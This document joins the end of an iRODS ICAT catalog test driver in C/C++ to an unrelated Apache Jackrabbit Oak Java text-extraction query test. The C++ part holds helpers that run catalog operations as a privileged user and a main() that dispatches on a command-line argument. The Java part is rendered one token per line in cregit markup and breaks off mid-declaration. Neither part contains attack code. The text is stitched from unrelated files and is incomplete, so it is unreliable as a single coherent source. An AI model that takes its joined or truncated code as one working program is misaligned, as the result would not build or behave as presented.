            int status = testRegDataObj( rsComm, myName, dataType, filePath );
            if ( status ) {
                return status;
            }
        }
        return chlCommit( rsComm );
    }
    catch ( ... ) {
        // Non-numeric or out-of-range count string.
        printf( "Invalid input: count\n" );
        return USER_INPUT_OPTION_ERR;
    }
}
// Exercise chlModDataObjMeta: update the dataCreate and dataComments
// columns of replica 0 of the named data object.  The remaining info
// fields mirror the fixed values used by testRegDataObj.
int testModDataObjMeta( rsComm_t *rsComm, char *name,
                        char *dataType, char *filePath ) {
    dataObjInfo_t info;
    keyValPair_t regParam;
    char createBuf[LONG_NAME_LEN];
    char commentBuf[LONG_NAME_LEN];
    memset( &info, 0, sizeof( info ) );
    memset( &regParam, 0, sizeof( regParam ) );
    // Columns to update, as key/value pairs consumed by chlModDataObjMeta.
    snprintf( createBuf, sizeof createBuf, "fake timestamp" );
    addKeyVal( &regParam, "dataCreate", createBuf );
    snprintf( commentBuf, sizeof commentBuf, "test comment" );
    addKeyVal( &regParam, "dataComments", commentBuf );
    // Identify the target object/replica.
    snprintf( info.objPath, sizeof( info.objPath ), "%s", name );
    snprintf( info.version, sizeof( info.version ), "%s", "12" );
    snprintf( info.dataType, sizeof( info.dataType ), "%s", dataType );
    snprintf( info.rescName, sizeof( info.rescName ), "%s", "resc A" );
    snprintf( info.filePath, sizeof( info.filePath ), "%s", filePath );
    info.replNum = 0;
    info.dataSize = 42;
    info.replStatus = 5;
    return chlModDataObjMeta( rsComm, &info, &regParam );
}
// Exercise the "all replicas" path of chlModDataObjMeta: with the "all"
// key present, set dataSize on every replica of the named object.
int testModDataObjMeta2( rsComm_t *rsComm, char *name,
                         char *dataType, char *filePath ) {
    dataObjInfo_t info;
    keyValPair_t regParam;
    char allBuf[LONG_NAME_LEN];
    char sizeBuf[LONG_NAME_LEN];
    memset( &info, 0, sizeof( info ) );
    memset( &regParam, 0, sizeof( regParam ) );
    snprintf( allBuf, sizeof allBuf, "whatever" );   // value of "all" is ignored; presence matters
    addKeyVal( &regParam, "all", allBuf );
    snprintf( sizeBuf, sizeof sizeBuf, "42" );
    addKeyVal( &regParam, "dataSize", sizeBuf );
    snprintf( info.objPath, sizeof( info.objPath ), "%s", name );
    snprintf( info.version, sizeof( info.version ), "%s", "12" );
    snprintf( info.dataType, sizeof( info.dataType ), "%s", dataType );
    snprintf( info.rescName, sizeof( info.rescName ), "%s", "resc A" );
    snprintf( info.filePath, sizeof( info.filePath ), "%s", filePath );
    info.replNum = 0;
    info.dataSize = 42;
    info.replStatus = 5;
    return chlModDataObjMeta( rsComm, &info, &regParam );
}
// Exercise chlModColl + chlCommit as a privileged user: update the type
// and info fields of a collection.  NULL or empty arguments leave the
// corresponding field zeroed (untouched in the input struct).
int testModColl( rsComm_t *rsComm, char *name, char *type,
                 char *info1, char *info2 ) {
    collInfo_t collInp;
    memset( &collInp, 0, sizeof( collInp ) );
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    if ( name != NULL && strlen( name ) > 0 ) {
        snprintf( collInp.collName, sizeof( collInp.collName ), "%s", name );
    }
    if ( type != NULL && strlen( type ) > 0 ) {
        snprintf( collInp.collType, sizeof( collInp.collType ), "%s", type );
    }
    if ( info1 != NULL && strlen( info1 ) > 0 ) {
        snprintf( collInp.collInfo1, sizeof( collInp.collInfo1 ), "%s", info1 );
    }
    if ( info2 != NULL && strlen( info2 ) > 0 ) {
        snprintf( collInp.collInfo2, sizeof( collInp.collInfo2 ), "%s", info2 );
    }
    int status = chlModColl( rsComm, &collInp );
    if ( status != 0 ) {
        return status;
    }
    return chlCommit( rsComm );
}
// Exercise chlModRuleExec: set a single attribute (attrName=attrValue) on
// the queued rule-execution row identified by id.
int testModRuleMeta( rsComm_t *rsComm, char *id,
                     char *attrName, char *attrValue ) {
    keyValPair_t regParam;
    char valueBuf[LONG_NAME_LEN];
    char ruleId[100];
    memset( &regParam, 0, sizeof( regParam ) );
    rstrcpy( valueBuf, attrValue, sizeof valueBuf );
    addKeyVal( &regParam, attrName, valueBuf );
    snprintf( ruleId, sizeof( ruleId ), "%s", id );
    return chlModRuleExec( rsComm, ruleId, &regParam );
}
// Exercise chlModRescFreeSpace as a privileged user, then either roll
// back, close, or commit depending on `option` ("rollback", "close",
// anything else commits).
int testModResourceFreeSpace( rsComm_t *rsComm, char *rescName,
                              char *numberString, char *option ) {
    // A leading backslash lets callers pass negative values through the
    // shell; strip it before conversion.
    if ( *numberString == '\\' ) {
        numberString++;
    }
    const int number = atoi( numberString );
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    int status = chlModRescFreeSpace( rsComm, rescName, number );
    if ( status != 0 ) {
        return status;
    }
    if ( option != NULL && strcmp( option, "rollback" ) == 0 ) {
        // Deliberately roll the change back (then still fall through to
        // the commit below, matching the original control flow).
        status = chlRollback( rsComm );
        if ( status < 0 ) {
            rodsLog( LOG_ERROR, "chlRollback failed in testModResourceFreeSpace %d", status );
        }
    }
    if ( option != NULL && strcmp( option, "close" ) == 0 ) {
        return chlClose();
    }
    return chlCommit( rsComm );
}
// Exercise chlRegReplica: register dstPath as a new replica of the
// existing data object identified by (srcPath, srcDataId, srcReplNum).
int testRegReplica( rsComm_t *rsComm, char *srcPath, char *srcDataId,
                    char *srcReplNum, char *dstPath ) {
    dataObjInfo_t src;
    dataObjInfo_t dst;
    keyValPair_t condInput;
    memset( &src, 0, sizeof( src ) );
    memset( &dst, 0, sizeof( dst ) );
    memset( &condInput, 0, sizeof( condInput ) );
    snprintf( src.objPath, sizeof( src.objPath ), "%s", srcPath );
    src.dataId = atoi( srcDataId );
    src.replNum = atoi( srcReplNum );
    snprintf( dst.rescName, sizeof( dst.rescName ), "%s", "resc A" );
    snprintf( dst.filePath, sizeof( dst.filePath ), "%s", dstPath );
    dst.replStatus = 5;   // arbitrary fixed test status
    return chlRegReplica( rsComm, &src, &dst, &condInput );
}
// Run chlSimpleQuery as a privileged user and print each chunk of output.
// `control` is the server's continuation flag: while it is non-zero the
// query is re-issued to fetch the next chunk.  `format` (optional)
// selects the output form code (defaults to 1).
int testSimpleQ( rsComm_t *rsComm, char *sql, char *arg1, char *format ) {
    char bigBuf[1000];
    int status;
    int control;
    int form;
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    control = 0;
    form = 1;
    if ( format != NULL ) {
        form = atoi( format );
    }
    // Pass sizeof(bigBuf) instead of repeating the literal 1000 so the
    // declared buffer size and the size told to the API cannot drift apart.
    status = chlSimpleQuery( rsComm, sql, arg1, 0, 0, 0,
                             form, &control, bigBuf, sizeof( bigBuf ) );
    if ( status == 0 ) {
        printf( "%s", bigBuf );
    }
    while ( control && ( status == 0 ) ) {
        status = chlSimpleQuery( rsComm, sql, 0, 0, 0, 0,
                                 form, &control, bigBuf, sizeof( bigBuf ) );
        if ( status == 0 ) {
            printf( "%s", bigBuf );
        }
    }
    return status;
}
// Exercise chlModAccessControl: set `access` for user#zone on `path`
// (non-recursive: first argument 0).
int testChmod( rsComm_t *rsComm, char *user, char *zone,
               char *access, char *path ) {
    return chlModAccessControl( rsComm, 0, user, zone, access, path );
}
// Exercise chlRegServerLoad with a fixed host/resource and dummy metric
// strings; `option` is passed through as one of the metric columns.
int testServerLoad( rsComm_t *rsComm, char *option ) {
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    return chlRegServerLoad( rsComm, "host", "resc", option, "2", "3",
                             "4", "5", "6", "7" );
}
// Exercise chlPurgeServerLoad; the age threshold defaults to "2000" when
// no option is supplied (units per chlPurgeServerLoad's contract).
int testPurgeServerLoad( rsComm_t *rsComm, char *option ) {
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    if ( option != NULL ) {
        return chlPurgeServerLoad( rsComm, option );
    }
    return chlPurgeServerLoad( rsComm, "2000" );
}
// Exercise chlRegServerLoadDigest with a fixed resource name; `option`
// supplies the load-factor value.
int testServerLoadDigest( rsComm_t *rsComm, char *option ) {
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    return chlRegServerLoadDigest( rsComm, "resc", option );
}
// Exercise chlPurgeServerLoadDigest; like testPurgeServerLoad, the age
// threshold defaults to "2000" when no option is supplied.
int testPurgeServerLoadDigest( rsComm_t *rsComm, char *option ) {
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    if ( option != NULL ) {
        return chlPurgeServerLoadDigest( rsComm, option );
    }
    return chlPurgeServerLoadDigest( rsComm, "2000" );
}
// Exercise chlCheckQuota and optionally verify the returned quota value
// and status against expected command-line values.  An expectedQuota
// prefixed with 'm' means "minus" (negative value), since a literal '-'
// is awkward to pass through the shell.
// Returns chlCheckQuota's status, or -1 / -2 if the quota / status does
// not match the expectation.
int testCheckQuota( rsComm_t *rsComm, char *userName, char *rescName,
                    char *expectedQuota, char *expectedStatus ) {
    int status;
    // Initialize the out-parameters: if chlCheckQuota fails it may leave
    // them unwritten, and the rodsLog below reads both unconditionally
    // (previously an indeterminate-value read on the failure path).
    int quotaStatus = 0;
    rodsLong_t userQuota = 0;
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    status = chlCheckQuota( rsComm, userName, rescName,
                            &userQuota, &quotaStatus );
    rodsLog( LOG_SQL,
             "chlCheckQuota status: userName:%s rescName:%s userQuota:%lld quotaStatus:%d\n",
             userName, rescName, userQuota, quotaStatus );
    if ( status == 0 ) {
        if ( expectedQuota != NULL && strlen( expectedQuota ) > 0 ) {
            rodsLong_t iExpectedQuota = atoll( expectedQuota );
            if ( expectedQuota[0] == 'm' ) {
                // 'm' prefix: expected value is the negation of the digits.
                rodsLong_t i = atoll( ( char * )&expectedQuota[1] );
                iExpectedQuota = -i;
            }
            if ( iExpectedQuota != userQuota ) {
                status = -1;
            }
        }
        if ( expectedStatus != NULL && strlen( expectedStatus ) > 0 ) {
            int iExpectedStatus = atoi( expectedStatus );
            if ( iExpectedStatus != quotaStatus ) {
                status = -2;
            }
        }
    }
    return status;
}
// Fetch the icat session handle.  The sequence-value query this helper
// once ran is commented out upstream (see the JMC note in history), so
// it now always returns 0.
rodsLong_t
testCurrent() {
    icatSessionStruct *icss;
    chlGetRcs( &icss );
    return 0;
}
// Exercise chlInsRuleTable: insert one rule row with a fixed timestamp
// and priority, printing the newly assigned rule id on success.
int
testAddRule( rsComm_t *rsComm, char *baseName, char *ruleName,
             char *ruleHead, char *ruleCondition, char *ruleAction,
             char *ruleRecovery ) {
    int status;
    char ruleIdStr[200];
    char myTime[] = "01277237323";   // fixed fake timestamp string
    char priority[] = "1";
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    // Pass the arrays directly (they decay to char*); the previous
    // "( char * )&array" casts converted a char(*)[N] and merely hid the
    // pointer-type mismatch from the compiler.
    status = chlInsRuleTable( rsComm, baseName, priority, ruleName,
                              ruleHead, ruleCondition, ruleAction,
                              ruleRecovery, ruleIdStr, myTime );
    if ( status == 0 ) {
        printf( "ruleIdStr: %s\n", ruleIdStr );
    }
    return status;
}
// Exercise chlVersionRuleBase with a fixed fake timestamp.
int
testVersionRuleBase( rsComm_t *rsComm, char *baseName ) {
    char myTime[] = "01277237323";
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    return chlVersionRuleBase( rsComm, baseName, myTime );
}
// Exercise chlVersionDvmBase with a fixed fake timestamp.
int
testVersionDvmBase( rsComm_t *rsComm, char *baseName ) {
    char myTime[] = "01277237323";
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    return chlVersionDvmBase( rsComm, baseName, myTime );
}
// Exercise chlInsFnmTable, forwarding the four command-line arguments.
int
testInsFnmTable( rsComm_t *rsComm, char *arg1, char *arg2, char *arg3,
                 char *arg4 ) {
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    return chlInsFnmTable( rsComm, arg1, arg2, arg3, arg4 );
}
// Exercise chlInsMsrvcTable, forwarding nine command-line arguments; the
// final column is hard-wired to "0".
int
testInsMsrvcTable( rsComm_t *rsComm, char *arg1, char *arg2, char *arg3,
                   char *arg4, char *arg5, char *arg6, char *arg7, char *arg8,
                   char *arg9 ) {
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    return chlInsMsrvcTable( rsComm, arg1, arg2, arg3, arg4,
                             arg5, arg6, arg7, arg8, arg9, "0" );
}
// Exercise chlInsDvmTable with a fixed fake timestamp.
int
testInsDvmTable( rsComm_t *rsComm, char *arg1, char *arg2, char *arg3,
                 char *arg4 ) {
    char myTime[] = "01277237323";
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    return chlInsDvmTable( rsComm, arg1, arg2, arg3, arg4, myTime );
}
// Exercise chlVersionFnmBase with a fixed fake timestamp.
int
testVersionFnmBase( rsComm_t *rsComm, char *arg1 ) {
    char myTime[] = "01277237323";
    rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
    return chlVersionFnmBase( rsComm, arg1, myTime );
}
/* Entry point.  Usage: test_chl testName [args...]
   Loads the iRODS client environment, opens the ICAT connection
   (chlOpen), then runs the single test* helper whose name matches
   argv[1].  didOne records whether any test name matched; the process
   exits with the selected test's status code. */
int
main( int argc, char **argv ) {
    int status;
    rsComm_t *Comm;
    char *mySubName;
    char *myName;
    int didOne;   /* set to 1 once argv[1] has matched a test below */
    Comm = ( rsComm_t* )malloc( sizeof( rsComm_t ) );
    memset( Comm, 0, sizeof( rsComm_t ) );
    rodsLogLevel( LOG_NOTICE );
    rodsLogSqlReq( 1 );   /* echo the SQL issued by the chl* calls */
    if ( argc < 2 ) {
        printf( "Usage: test_chl testName [args...]\n" );
        exit( 3 );
    }
    rodsEnv myEnv;
    status = getRodsEnv( &myEnv );
    if ( status < 0 ) {
        rodsLog( LOG_ERROR, "main: getRodsEnv error. status = %d",
                 status );
        exit( 1 );
    }
    /* Enable ICAT-level debugging if the environment requests it. */
    if ( strstr( myEnv.rodsDebug, "CAT" ) != NULL ) {
        chlDebug( myEnv.rodsDebug );
    }
    /* Act as the user/zone from the client environment by default;
       individual tests may override the auth flags. */
    snprintf( Comm->clientUser.userName, sizeof( Comm->clientUser.userName ),
              "%s", myEnv.rodsUserName );
    snprintf( Comm->clientUser.rodsZone, sizeof( Comm->clientUser.rodsZone ),
              "%s", myEnv.rodsZone );
    /*
      char rodsUserName[NAME_LEN];
      char rodsZone[NAME_LEN];
      userInfo_t clientUser;
      char userName[NAME_LEN];
      char rodsZone[NAME_LEN];
    */
    if ( ( status = chlOpen() ) != 0 ) {
        rodsLog( LOG_SYS_FATAL,
                 "initInfoWithRcat: chlopen Error. Status = %d",
                 status );
        free( Comm ); // JMC cppcheck - leak
        return status;
    }
    /* Dispatch table: each block runs when argv[1] names its test.  The
       names are mutually exclusive, so at most one block executes. */
    didOne = 0;
    if ( strcmp( argv[1], "reg" ) == 0 ) {
        status = testRegDataObj( Comm, argv[2], argv[3], argv[4] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "regmulti" ) == 0 ) {
        status = testRegDataMulti( Comm, argv[2], argv[3], argv[4], argv[5] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "mod" ) == 0 ) {
        status = testModDataObjMeta( Comm, argv[2], argv[3], argv[4] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "mod2" ) == 0 ) {
        status = testModDataObjMeta2( Comm, argv[2], argv[3], argv[4] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "modr" ) == 0 ) {
        status = testModRuleMeta( Comm, argv[2], argv[3], argv[4] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "modc" ) == 0 ) {
        status = testModColl( Comm, argv[2], argv[3], argv[4], argv[5] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "rmrule" ) == 0 ) {
        status = testDelRule( Comm, argv[2], argv[3] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "modrfs" ) == 0 ) {
        status = testModResourceFreeSpace( Comm, argv[2], argv[3], argv[4] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "rep" ) == 0 ) {
        if ( argc < 6 ) {
            printf( "too few arguments\n" );
            exit( 1 );
        }
        status = testRegReplica( Comm, argv[2], argv[3], argv[4], argv[5] );
        didOne = 1;
    }
    /*
      if (strcmp(argv[1],"cml")==0) {
      status = testCml(Comm);
      didOne=1;
      }
    */
    if ( strcmp( argv[1], "mkdir" ) == 0 ) {
        status = testRegColl( Comm, argv[2] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "rmdir" ) == 0 ) {
        status = testDelColl( Comm, argv[2] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "sql" ) == 0 ) {
        status = testSimpleQ( Comm, argv[2], argv[3], argv[4] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "rm" ) == 0 ) {
        status = testDelFile( Comm, argv[2], argv[3] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "rmtrash" ) == 0 ) {
        status = testDelFileTrash( Comm, argv[2], argv[3] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "rmpriv" ) == 0 ) {
        status = testDelFilePriv( Comm, argv[2], argv[3], argv[4] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "chmod" ) == 0 ) {
        status = testChmod( Comm, argv[2], argv[3], argv[4], argv[5] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "regrule" ) == 0 ) {
        status = testRegRule( Comm, argv[2] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "rename" ) == 0 ) {
        status = testRename( Comm, argv[2], argv[3] );
        // JMC testCurrent(); // exercise this as part of rename;
        // testCurrent needs a SQL context
        didOne = 1;
    }
    if ( strcmp( argv[1], "login" ) == 0 ) {
        printf( "login - 2 [%s] 3 [%s] 4 [%s]\n", argv[2], argv[3], argv[4] );
        status = testLogin( argv[2], argv[3], argv[4], myEnv );
        didOne = 1;
    }
    if ( strcmp( argv[1], "move" ) == 0 ) {
        status = testMove( Comm, argv[2], argv[3] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "checkauth" ) == 0 ) {
        status = testCheckAuth( Comm, argv[2], argv[3], argv[4] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "temppw" ) == 0 ) {
        status = testTempPw( Comm );
        didOne = 1;
    }
    if ( strcmp( argv[1], "tpc" ) == 0 ) {
        status = testTempPwConvert( argv[2], argv[3] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "tpw" ) == 0 ) {
        status = testTempPwCombined( Comm, argv[2] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "tpwforother" ) == 0 ) {
        status = testTempPwForOther( Comm, argv[2], argv[3] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "serverload" ) == 0 ) {
        status = testServerLoad( Comm, argv[2] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "purgeload" ) == 0 ) {
        status = testPurgeServerLoad( Comm, argv[2] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "serverdigest" ) == 0 ) {
        status = testServerLoadDigest( Comm, argv[2] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "purgedigest" ) == 0 ) {
        status = testPurgeServerLoadDigest( Comm, argv[2] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "checkquota" ) == 0 ) {
        /* Expected-quota/status arguments are optional. */
        if ( argc < 5 ) {
            status = testCheckQuota( Comm, argv[2], argv[3],
                                     NULL, NULL );
        }
        else {
            status = testCheckQuota( Comm, argv[2], argv[3],
                                     argv[4], argv[5] );
        }
        didOne = 1;
    }
    if ( strcmp( argv[1], "open" ) == 0 ) {
        /* Cycle the connection a few times to exercise close/re-open. */
        int i;
        for ( i = 0; i < 3; i++ ) {
            status = chlClose();
            if ( status ) {
                printf( "close %d error", i );
            }
            if ( ( status = chlOpen() ) != 0 ) {
                rodsLog( LOG_SYS_FATAL,
                         "initInfoWithRcat: chlopen %d Error. Status = %d",
                         i, status );
                return status;
            }
        }
        didOne = 1;
    }
    if ( strcmp( argv[1], "addrule" ) == 0 ) {
        status = testAddRule( Comm, argv[2], argv[3],
                              argv[4], argv[5],
                              argv[6], argv[7] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "versionrulebase" ) == 0 ) {
        status = testVersionRuleBase( Comm, argv[2] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "versiondvmbase" ) == 0 ) {
        status = testVersionDvmBase( Comm, argv[2] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "versionfnmbase" ) == 0 ) {
        status = testVersionFnmBase( Comm, argv[2] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "insfnmtable" ) == 0 ) {
        status = testInsFnmTable( Comm, argv[2], argv[3], argv[4], argv[5] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "insdvmtable" ) == 0 ) {
        status = testInsDvmTable( Comm, argv[2], argv[3], argv[4], argv[5] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "insmsrvctable" ) == 0 ) {
        status = testInsMsrvcTable( Comm, argv[2], argv[3], argv[4], argv[5],
                                    argv[6], argv[7], argv[8], argv[9], argv[10] );
        if ( status == 0 ) {
            /* do it a second time to test another logic path and
               different SQL. Since no commit is part of the chl
               function, and there is not corresponding Delete call, this
               is an easy way to do this. */
            status = testInsMsrvcTable( Comm, argv[2], argv[3], argv[4], argv[5],
                                        argv[6], argv[7], argv[8], argv[9], argv[10] );
        }
        didOne = 1;
    }
    if ( strcmp( argv[1], "getlocalzone" ) == 0 ) {
        status = testGetLocalZone( argv[2] );
        didOne = 1;
    }
    if ( strcmp( argv[1], "getpampw" ) == 0 ) {
        status = testGetPamPw( Comm, argv[2], argv[3] );
        didOne = 1;
    }
    /* Report the outcome: translate a non-zero status into its iRODS
       error name and sub-name for the log. */
    if ( status != 0 ) {
        /*
          if (Comm->rError) {
          rError_t *Err;
          rErrMsg_t *ErrMsg;
          int i, len;
          Err = Comm->rError;
          len = Err->len;
          for (i=0;i<len;i++) {
          ErrMsg = Err->errMsg[i];
          rodsLog(LOG_ERROR, "Level %d: %s",i, ErrMsg->msg);
          }
          }
        */
        myName = rodsErrorName( status, &mySubName );
        rodsLog( LOG_ERROR, "%s failed with error %d %s %s", argv[1],
                 status, myName, mySubName );
    }
    else {
        if ( didOne ) {
            printf( "Completed successfully\n" );
        }
    }
    if ( didOne == 0 ) {
        printf( "Unknown test type: %s\n", argv[1] );
    }
    exit( status );
}
/* Dummy stand-in for icatApplyRule so this ICAT test program can link
   without the rule engine; it accepts any rule invocation and always
   reports success (0). */
int
icatApplyRule( rsComm_t*, char*, char* ) {
    return 0;
}
|
sho25/jackrabbit-oak
|
oak-lucene/src/test/java/org/apache/jackrabbit/oak/jcr/query/TextExtractionQueryTest.java
|
<filename>oak-lucene/src/test/java/org/apache/jackrabbit/oak/jcr/query/TextExtractionQueryTest.java
begin_unit|revision:0.9.5;language:Java;cregit-version:0.0.1
begin_comment
comment|/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */
end_comment
begin_package
package|package
name|org
operator|.
name|apache
operator|.
name|jackrabbit
operator|.
name|oak
operator|.
name|jcr
operator|.
name|query
package|;
end_package
begin_import
import|import
name|java
operator|.
name|io
operator|.
name|ByteArrayInputStream
import|;
end_import
begin_import
import|import
name|java
operator|.
name|io
operator|.
name|IOException
import|;
end_import
begin_import
import|import
name|java
operator|.
name|io
operator|.
name|InputStream
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|Binary
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|Node
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|RepositoryException
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|nodetype
operator|.
name|NodeType
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|query
operator|.
name|InvalidQueryException
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|query
operator|.
name|Query
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|query
operator|.
name|QueryResult
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|query
operator|.
name|RowIterator
import|;
end_import
begin_import
import|import
name|org
operator|.
name|apache
operator|.
name|jackrabbit
operator|.
name|JcrConstants
import|;
end_import
begin_import
import|import
name|org
operator|.
name|apache
operator|.
name|jackrabbit
operator|.
name|commons
operator|.
name|JcrUtils
import|;
end_import
begin_import
import|import
name|org
operator|.
name|apache
operator|.
name|jackrabbit
operator|.
name|core
operator|.
name|query
operator|.
name|AbstractQueryTest
import|;
end_import
begin_class
specifier|public
class|class
name|TextExtractionQueryTest
extends|extends
name|AbstractQueryTest
block|{
specifier|public
name|void
name|testScoreWithoutFulltext
parameter_list|()
throws|throws
name|Exception
block|{
name|System
operator|.
name|out
operator|.
name|println
argument_list|(
name|Query
operator|.
name|JCR_SQL2
argument_list|)
expr_stmt|;
name|QueryResult
name|r
init|=
name|executeSQL2Query
argument_list|(
literal|"select [jcr:path] from [nt:base] order by [jcr:score]"
argument_list|)
decl_stmt|;
name|RowIterator
name|it
init|=
name|r
operator|.
name|getRows
argument_list|()
decl_stmt|;
while|while
condition|(
name|it
operator|.
name|hasNext
argument_list|()
condition|)
block|{
name|it
operator|.
name|nextRow
argument_list|()
expr_stmt|;
block|}
block|}
specifier|public
name|void
name|testFileContains
parameter_list|()
throws|throws
name|Exception
block|{
name|assertFileContains
argument_list|(
literal|"test.txt"
argument_list|,
literal|"text/plain"
argument_list|,
literal|"AE502DBEA2C411DEBD340AD156D89593"
argument_list|)
expr_stmt|;
name|assertFileContains
argument_list|(
literal|"test.rtf"
argument_list|,
literal|"application/rtf"
argument_list|,
literal|"quick brown fox"
argument_list|)
expr_stmt|;
block|}
specifier|public
name|void
name|testNtFile
parameter_list|()
throws|throws
name|RepositoryException
throws|,
name|IOException
block|{
while|while
condition|(
name|testRootNode
operator|.
name|hasNode
argument_list|(
name|nodeName1
argument_list|)
condition|)
block|{
name|testRootNode
operator|.
name|getNode
argument_list|(
name|nodeName1
argument_list|)
operator|.
name|remove
argument_list|()
expr_stmt|;
block|}
name|String
name|content
init|=
literal|"The quick brown fox jumps over the lazy dog."
decl_stmt|;
name|Node
name|file
init|=
name|JcrUtils
operator|.
name|putFile
argument_list|(
name|testRootNode
argument_list|,
name|nodeName1
argument_list|,
literal|"text/plain"
argument_list|,
operator|new
name|ByteArrayInputStream
argument_list|(
name|content
operator|.
name|getBytes
argument_list|(
literal|"UTF-8"
argument_list|)
argument_list|)
argument_list|)
decl_stmt|;
name|testRootNode
operator|.
name|getSession
argument_list|()
operator|.
name|save
argument_list|()
expr_stmt|;
name|String
name|xpath
init|=
name|testPath
operator|+
literal|"/*[jcr:contains(jcr:content, 'lazy')]"
decl_stmt|;
name|executeXPathQuery
argument_list|(
name|xpath
argument_list|,
operator|new
name|Node
index|[]
block|{
name|file
block|}
argument_list|)
expr_stmt|;
block|}
specifier|private
name|void
name|assertFileContains
parameter_list|(
name|String
name|name
parameter_list|,
name|String
name|type
parameter_list|,
name|String
modifier|...
name|statements
parameter_list|)
throws|throws
name|Exception
block|{
if|if
condition|(
name|testRootNode
operator|.
name|hasNode
argument_list|(
name|nodeName1
argument_list|)
condition|)
block|{
name|testRootNode
operator|.
name|getNode
argument_list|(
name|nodeName1
argument_list|)
operator|.
name|remove
argument_list|()
expr_stmt|;
block|}
name|testRootNode
operator|.
name|getSession
argument_list|()
operator|.
name|save
argument_list|()
expr_stmt|;
name|Node
name|resource
init|=
name|testRootNode
operator|.
name|addNode
argument_list|(
name|nodeName1
argument_list|,
name|NodeType
operator|.
name|NT_RESOURCE
argument_list|)
decl_stmt|;
name|resource
operator|.
name|setProperty
argument_list|(
name|JcrConstants
operator|.
name|JCR_MIMETYPE
argument_list|,
name|type
argument_list|)
expr_stmt|;
name|InputStream
name|stream
init|=
name|getClass
argument_list|()
operator|.
name|getResourceAsStream
argument_list|(
name|name
argument_list|)
decl_stmt|;
name|assertNotNull
argument_list|(
name|stream
argument_list|)
expr_stmt|;
try|try
block|{
name|Binary
name|binary
init|=
name|testRootNode
operator|.
name|getSession
argument_list|()
operator|.
name|getValueFactory
argument_list|()
operator|.
name|createBinary
argument_list|(
name|stream
argument_list|)
decl_stmt|;
name|resource
operator|.
name|setProperty
argument_list|(
name|JcrConstants
operator|.
name|JCR_DATA
argument_list|,
name|binary
argument_list|)
expr_stmt|;
block|}
finally|finally
block|{
name|stream
operator|.
name|close
argument_list|()
expr_stmt|;
block|}
name|testRootNode
operator|.
name|getSession
argument_list|()
operator|.
name|save
argument_list|()
expr_stmt|;
for|for
control|(
name|String
name|statement
range|:
name|statements
control|)
block|{
name|assertContainsQuery
argument_list|(
name|statement
argument_list|,
literal|true
argument_list|)
expr_stmt|;
block|}
block|}
annotation|@
name|SuppressWarnings
argument_list|(
literal|"deprecation"
argument_list|)
specifier|private
name|void
